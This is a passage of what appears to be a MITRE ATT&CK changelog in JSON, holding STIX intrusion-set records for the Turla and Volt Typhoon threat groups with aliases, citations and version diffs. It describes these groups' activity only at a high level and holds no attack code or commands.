                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 16:07:46.964000+00:00\", \"old_value\": \"2025-04-25 14:49:05.962000+00:00\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://web.archive.org/web/20150626073312/http://www.secureworks.com/resources/blog/living-off-the-land/\", \"old_value\": \"http://www.secureworks.com/resources/blog/living-off-the-land/\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.1"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2017-05-31 21:31:49.816000+00:00",
                    "modified": "2026-01-20 15:11:37.732000+00:00",
                    "name": "Turla",
                    "description": "[Turla](https://attack.mitre.org/groups/G0010) is a cyber espionage threat group that has been attributed to Russia's Federal Security Service (FSB).  They have compromised victims in over 50 countries since at least 2004, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies. [Turla](https://attack.mitre.org/groups/G0010) is known for conducting watering hole and spearphishing campaigns, and leveraging in-house tools and malware, such as [Uroburos](https://attack.mitre.org/software/S0022).(Citation: Kaspersky Turla)(Citation: ESET Gazer Aug 2017)(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla Mosquito Jan 2018)(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)",
                    "aliases": [
                        "Turla",
                        "IRON HUNTER",
                        "Group 88",
                        "Waterbug",
                        "WhiteBear",
                        "Snake",
                        "Krypton",
                        "Venomous Bear",
                        "Secret Blizzard",
                        "BELUGASTURGEON"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G0010",
                            "external_id": "G0010"
                        },
                        {
                            "source_name": "BELUGASTURGEON",
                            "description": "(Citation: Accenture HyperStack October 2020)"
                        },
                        {
                            "source_name": "Krypton",
                            "description": "(Citation: CrowdStrike VENOMOUS BEAR)"
                        },
                        {
                            "source_name": "Snake",
                            "description": "(Citation: CrowdStrike VENOMOUS BEAR)(Citation: ESET Turla PowerShell May 2019)(Citation: Talos TinyTurla September 2021)"
                        },
                        {
                            "source_name": "Venomous Bear",
                            "description": "(Citation: CrowdStrike VENOMOUS BEAR)(Citation: Talos TinyTurla September 2021)"
                        },
                        {
                            "source_name": "Turla",
                            "description": "(Citation: Kaspersky Turla)"
                        },
                        {
                            "source_name": "Group 88",
                            "description": "(Citation: Leonardo Turla Penquin May 2020)"
                        },
                        {
                            "source_name": "Secret Blizzard",
                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
                        },
                        {
                            "source_name": "IRON HUNTER",
                            "description": "(Citation: Secureworks IRON HUNTER Profile)"
                        },
                        {
                            "source_name": "Accenture HyperStack October 2020",
                            "description": "Accenture. (2020, October). Turla uses HyperStack, Carbon, and Kazuar to compromise government entity. Retrieved December 2, 2020.",
                            "url": "https://web.archive.org/web/20201101015247/https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity"
                        },
                        {
                            "source_name": "Waterbug",
                            "description": "Based similarity in TTPs and malware used, Turla and Waterbug appear to be the same group.(Citation: Symantec Waterbug)"
                        },
                        {
                            "source_name": "Talos TinyTurla September 2021",
                            "description": "Cisco Talos. (2021, September 21). TinyTurla - Turla deploys new malware to keep a secret backdoor on victim machines. Retrieved December 2, 2021.",
                            "url": "https://blog.talosintelligence.com/2021/09/tinyturla.html"
                        },
                        {
                            "source_name": "ESET Turla Mosquito Jan 2018",
                            "description": "ESET, et al. (2018, January). Diplomats in Eastern Europe bitten by a Turla mosquito. Retrieved July 3, 2018.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf"
                        },
                        {
                            "source_name": "ESET Gazer Aug 2017",
                            "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.",
                            "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf"
                        },
                        {
                            "source_name": "ESET Turla PowerShell May 2019",
                            "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
                            "url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/"
                        },
                        {
                            "source_name": "Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023",
                            "description": "FBI et al. (2023, May 9). Hunting Russian Intelligence \u201cSnake\u201d Malware. Retrieved June 8, 2023.",
                            "url": "https://www.cisa.gov/sites/default/files/2023-05/aa23-129a_snake_malware_2.pdf"
                        },
                        {
                            "source_name": "Securelist WhiteBear Aug 2017",
                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2017, August 30). Introducing WhiteBear. Retrieved September 21, 2017.",
                            "url": "https://securelist.com/introducing-whitebear/81638/"
                        },
                        {
                            "source_name": "Kaspersky Turla",
                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
                            "url": "https://securelist.com/the-epic-turla-operation/65545/"
                        },
                        {
                            "source_name": "Leonardo Turla Penquin May 2020",
                            "description": "Leonardo. (2020, May 29). MALWARE TECHNICAL INSIGHT TURLA \u201cPenquin_x64\u201d. Retrieved March 11, 2021.",
                            "url": "https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf"
                        },
                        {
                            "source_name": "CrowdStrike VENOMOUS BEAR",
                            "description": "Meyers, A. (2018, March 12). Meet CrowdStrike\u2019s Adversary of the Month for March: VENOMOUS BEAR. Retrieved May 16, 2018.",
                            "url": "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/"
                        },
                        {
                            "source_name": "Microsoft Threat Actor Naming July 2023",
                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
                        },
                        {
                            "source_name": "Secureworks IRON HUNTER Profile",
                            "description": "Secureworks CTU. (n.d.). IRON HUNTER. Retrieved February 22, 2022.",
                            "url": "http://www.secureworks.com/research/threat-profiles/iron-hunter"
                        },
                        {
                            "source_name": "Symantec Waterbug",
                            "description": "Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.",
                            "url": "https://www.threatminer.org/report.php?q=waterbug-attack-group.pdf&y=2015#gsc.tab=0&gsc.q=waterbug-attack-group.pdf&gsc.page=1"
                        },
                        {
                            "source_name": "WhiteBear",
                            "description": "WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Matthieu Faou, ESET",
                        "Edward Millington"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "5.1",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-01-20 15:11:37.732000+00:00\", \"old_value\": \"2024-06-26 18:09:33.862000+00:00\"}, \"root['external_references'][9]['url']\": {\"new_value\": \"https://web.archive.org/web/20201101015247/https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\", \"old_value\": \"https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "5.1"
                },
                {
                    "type": "intrusion-set",
                    "spec_version": "2.1",
                    "id": "intrusion-set--174279b4-399f-4ddb-966e-5efedd1dd5f2",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2023-07-27 20:35:46.206000+00:00",
                    "modified": "2026-04-27 03:57:23.174000+00:00",
                    "name": "Volt Typhoon",
                    "description": "[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023). The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, activity associated with the KV botnet.(Citation: DOJ KVBotnet 2024). \n\nReporting indicates a separate initial access cluster, SYLVANITE, has been observed exploiting internet-facing edge devices and transferring access to [Volt Typhoon](https://attack.mitre.org/groups/G1017), also tracked as VOLTZITE, for follow-on operations. (Citation: Dragos 2025 Year in Review)",
                    "aliases": [
                        "Volt Typhoon",
                        "BRONZE SILHOUETTE",
                        "Vanguard Panda",
                        "DEV-0391",
                        "UNC3236",
                        "Voltzite",
                        "Insidious Taurus",
                        "DazedToad"
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/groups/G1017",
                            "external_id": "G1017"
                        },
                        {
                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
                            "url": "https://blog.cloudflare.com/2026-threat-report/"
                        },
                        {
                            "source_name": "Vanguard Panda",
                            "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)"
                        },
                        {
                            "source_name": "DEV-0391",
                            "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)"
                        },
                        {
                            "source_name": "UNC3236",
                            "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)"
                        },
                        {
                            "source_name": "Voltzite",
                            "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)"
                        },
                        {
                            "source_name": "Insidious Taurus",
                            "description": "(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)"
                        },
                        {
                            "source_name": "DazedToad",
                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
                        },
                        {
                            "source_name": "BRONZE SILHOUETTE",
                            "description": "(Citation: Secureworks BRONZE SILHOUETTE May 2023)(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)"
                        },
                        {
                            "source_name": "CISA AA24-038A PRC Critical Infrastructure February 2024",
                            "description": "CISA et al.. (2024, February 7). PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. Retrieved May 15, 2024.",
                            "url": "https://www.cisa.gov/sites/default/files/2024-03/aa24-038a_csa_prc_state_sponsored_actors_compromise_us_critical_infrastructure_3.pdf"
                        },
                        {
                            "source_name": "Secureworks BRONZE SILHOUETTE May 2023",
                            "description": "Counter Threat Unit Research Team. (2023, May 24). Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations. Retrieved July 27, 2023.",
                            "url": "https://web.archive.org/web/20230601025540/https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations"
                        },
                        {
                            "source_name": "Dragos 2025 Year in Review",
                            "description": "Dragos. (2026, February). 9TH ANNUAL YEAR IN REVIEW | OT/ICS CYBERSECURITY REPORT . Retrieved April 26, 2026.",
                            "url": "https://5943619.hs-sites.com/hubfs/312-Year-in-Review/2026/Dragos-2026-OT-Cybersecurity-Report-A-Year-in-Review.pdf?hsCtaAttrib=205683189348"
                        },
                        {
                            "source_name": "Microsoft Volt Typhoon May 2023",
                            "description": "Microsoft Threat Intelligence. (2023, May 24). Volt Typhoon targets US critical infrastructure with living-off-the-land techniques. Retrieved July 27, 2023.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/"
                        },
                        {
                            "source_name": "Joint Cybersecurity Advisory Volt Typhoon June 2023",
                            "description": "NSA et al. (2023, May 24). People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection. Retrieved July 27, 2023.",
                            "url": "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
                        },
                        {
                            "source_name": "DOJ KVBotnet 2024",
                            "description": "US Department of Justice. (2024, January 31). U.S. Government Disrupts Botnet People\u2019s Republic of China Used to Conceal Hacking of Critical Infrastructure. Retrieved June 10, 2024.",
                            "url": "https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Ai Kimura, NEC Corporation",
                        "Manikantan Srinivasan, NEC Corporation India",
                        "Phyo Paing Htun (ChiLai), I-Secure Co.,Ltd",
                        "Pooja Natarajan, NEC Corporation India",
                        "Vlad Shumaher, Palo Alto Networks"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.0",
                    "detailed_diff": "{\"dictionary_item_added\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-27 03:57:23.174000+00:00\", \"old_value\": \"2025-04-30 13:27:45.018000+00:00\"}, \"root['description']\": {\"new_value\": \"[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023). The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, activity associated with the KV botnet.(Citation: DOJ KVBotnet 2024). \\n\\nReporting indicates a separate initial access cluster, SYLVANITE, has been observed exploiting internet-facing edge devices and transferring access to [Volt Typhoon](https://attack.mitre.org/groups/G1017), also tracked as VOLTZITE, for follow-on operations. (Citation: Dragos 2025 Year in Review)\", \"old_value\": \"[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021 primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n-[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021 primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023)\\n+[Volt Typhoon](https://attack.mitre.org/groups/G1017) is a People's Republic of China (PRC) state-sponsored actor that has been active since at least 2021, primarily targeting critical infrastructure organizations in the US and its territories including Guam. [Volt Typhoon](https://attack.mitre.org/groups/G1017)'s targeting and pattern of behavior have been assessed as pre-positioning to enable lateral movement to operational technology (OT) assets for potential destructive or disruptive attacks. [Volt Typhoon](https://attack.mitre.org/groups/G1017) has emphasized stealth in operations using web shells, living-off-the-land (LOTL) binaries, hands on keyboard activities, and stolen credentials.(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024)(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)(Citation: Secureworks BRONZE SILHOUETTE May 2023). The group has leveraged compromised SOHO routers to proxy command and control traffic and obscure its infrastructure, activity associated with the KV botnet.(Citation: DOJ KVBotnet 2024). \\n+\\n+Reporting indicates a separate initial access cluster, SYLVANITE, has been observed exploiting internet-facing edge devices and transferring access to [Volt Typhoon](https://attack.mitre.org/groups/G1017), also tracked as VOLTZITE, for follow-on operations. (Citation: Dragos 2025 Year in Review)\"}, \"root['external_references'][8]['url']\": {\"new_value\": \"https://web.archive.org/web/20230601025540/https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations\", \"old_value\": \"https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations\", \"new_path\": \"root['external_references'][10]['url']\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_added\": {\"root['aliases'][7]\": \"DazedToad\", \"root['external_references'][1]\": {\"source_name\": \"Cloudflare 2026 Threat Report New Threat Actors March 2026\", \"description\": \" Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.\", \"url\": \"https://blog.cloudflare.com/2026-threat-report/\"}, \"root['external_references'][7]\": {\"source_name\": \"DazedToad\", \"description\": \"(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)\"}, \"root['external_references'][11]\": {\"source_name\": \"Dragos 2025 Year in Review\", \"description\": \"Dragos. (2026, February). 9TH ANNUAL YEAR IN REVIEW | OT/ICS CYBERSECURITY REPORT . Retrieved April 26, 2026.\", \"url\": \"https://5943619.hs-sites.com/hubfs/312-Year-in-Review/2026/Dragos-2026-OT-Cybersecurity-Report-A-Year-in-Review.pdf?hsCtaAttrib=205683189348\"}, \"root['external_references'][14]\": {\"source_name\": \"DOJ KVBotnet 2024\", \"description\": \"US Department of Justice. (2024, January 31). U.S. Government Disrupts Botnet People\\u2019s Republic of China Used to Conceal Hacking of Critical Infrastructure. Retrieved June 10, 2024.\", \"url\": \"https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical\"}}}",
                    "previous_version": "2.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to48__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to48__0\"><a href=\"#difflib_chg_to48__top\">t</a></td><td class=\"diff_header\" id=\"from48_1\">1</td><td nowrap=\"nowrap\">[Volt&nbsp;Typhoon](https://attack.mitre.org/groups/G1017)&nbsp;is&nbsp;a&nbsp;P</td><td class=\"diff_next\"><a href=\"#difflib_chg_to48__top\">t</a></td><td class=\"diff_header\" id=\"to48_1\">1</td><td nowrap=\"nowrap\">[Volt&nbsp;Typhoon](https://attack.mitre.org/groups/G1017)&nbsp;is&nbsp;a&nbsp;P</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eople's&nbsp;Republic&nbsp;of&nbsp;China&nbsp;(PRC)&nbsp;state-sponsored&nbsp;actor&nbsp;that&nbsp;h</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eople's&nbsp;Republic&nbsp;of&nbsp;China&nbsp;(PRC)&nbsp;state-sponsored&nbsp;actor&nbsp;that&nbsp;h</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;been&nbsp;active&nbsp;since&nbsp;at&nbsp;least&nbsp;2021&nbsp;primarily&nbsp;targeting&nbsp;criti</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;been&nbsp;active&nbsp;since&nbsp;at&nbsp;least&nbsp;2021<span class=\"diff_add\">,</span>&nbsp;primarily&nbsp;targeting&nbsp;crit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cal&nbsp;infrastructure&nbsp;organizations&nbsp;in&nbsp;the&nbsp;US&nbsp;and&nbsp;its&nbsp;territori</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ical&nbsp;infrastructure&nbsp;organizations&nbsp;in&nbsp;the&nbsp;US&nbsp;and&nbsp;its&nbsp;territor</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">es&nbsp;including&nbsp;Guam.&nbsp;[Volt&nbsp;Typhoon](https://attack.mitre.org/g</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ies&nbsp;including&nbsp;Guam.&nbsp;[Volt&nbsp;Typhoon](https://attack.mitre.org/</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">roups/G1017)'s&nbsp;targeting&nbsp;and&nbsp;pattern&nbsp;of&nbsp;behavior&nbsp;have&nbsp;been&nbsp;a</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">groups/G1017)'s&nbsp;targeting&nbsp;and&nbsp;pattern&nbsp;of&nbsp;behavior&nbsp;have&nbsp;been&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ssessed&nbsp;as&nbsp;pre-positioning&nbsp;to&nbsp;enable&nbsp;lateral&nbsp;movement&nbsp;to&nbsp;ope</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">assessed&nbsp;as&nbsp;pre-positioning&nbsp;to&nbsp;enable&nbsp;lateral&nbsp;movement&nbsp;to&nbsp;op</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rational&nbsp;technology&nbsp;(OT)&nbsp;assets&nbsp;for&nbsp;potential&nbsp;destructive&nbsp;or</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">erational&nbsp;technology&nbsp;(OT)&nbsp;assets&nbsp;for&nbsp;potential&nbsp;destructive&nbsp;o</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;disruptive&nbsp;attacks.&nbsp;[Volt&nbsp;Typhoon](https://attack.mitre.org</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">r&nbsp;disruptive&nbsp;attacks.&nbsp;[Volt&nbsp;Typhoon](https://attack.mitre.or</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">/groups/G1017)&nbsp;has&nbsp;emphasized&nbsp;stealth&nbsp;in&nbsp;operations&nbsp;using&nbsp;we</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g/groups/G1017)&nbsp;has&nbsp;emphasized&nbsp;stealth&nbsp;in&nbsp;operations&nbsp;using&nbsp;w</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">b&nbsp;shells,&nbsp;living-off-the-land&nbsp;(LOTL)&nbsp;binaries,&nbsp;hands&nbsp;on&nbsp;keyb</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eb&nbsp;shells,&nbsp;living-off-the-land&nbsp;(LOTL)&nbsp;binaries,&nbsp;hands&nbsp;on&nbsp;key</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oard&nbsp;activities,&nbsp;and&nbsp;stolen&nbsp;credentials.(Citation:&nbsp;CISA&nbsp;AA24</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">board&nbsp;activities,&nbsp;and&nbsp;stolen&nbsp;credentials.(Citation:&nbsp;CISA&nbsp;AA2</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">-038A&nbsp;PRC&nbsp;Critical&nbsp;Infrastructure&nbsp;February&nbsp;2024)(Citation:&nbsp;M</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">4-038A&nbsp;PRC&nbsp;Critical&nbsp;Infrastructure&nbsp;February&nbsp;2024)(Citation:&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">icrosoft&nbsp;Volt&nbsp;Typhoon&nbsp;May&nbsp;2023)(Citation:&nbsp;Joint&nbsp;Cybersecurit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Microsoft&nbsp;Volt&nbsp;Typhoon&nbsp;May&nbsp;2023)(Citation:&nbsp;Joint&nbsp;Cybersecuri</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">y&nbsp;Advisory&nbsp;Volt&nbsp;Typhoon&nbsp;June&nbsp;2023)(Citation:&nbsp;Secureworks&nbsp;BRO</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ty&nbsp;Advisory&nbsp;Volt&nbsp;Typhoon&nbsp;June&nbsp;2023)(Citation:&nbsp;Secureworks&nbsp;BR</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">NZE&nbsp;SILHOUETTE&nbsp;May&nbsp;2023)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ONZE&nbsp;SILHOUETTE&nbsp;May&nbsp;2023)<span class=\"diff_add\">.&nbsp;The&nbsp;group&nbsp;has&nbsp;leveraged&nbsp;compromis</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ed&nbsp;SOHO&nbsp;routers&nbsp;to&nbsp;proxy&nbsp;command&nbsp;and&nbsp;control&nbsp;traffic&nbsp;and&nbsp;obs</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">cure&nbsp;its&nbsp;infrastructure,&nbsp;activity&nbsp;associated&nbsp;with&nbsp;the&nbsp;KV&nbsp;bot</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">net.(Citation:&nbsp;DOJ&nbsp;KVBotnet&nbsp;2024).&nbsp;&nbsp;&nbsp;Reporting&nbsp;indicates&nbsp;a&nbsp;s</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">eparate&nbsp;initial&nbsp;access&nbsp;cluster,&nbsp;SYLVANITE,&nbsp;has&nbsp;been&nbsp;observed</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td 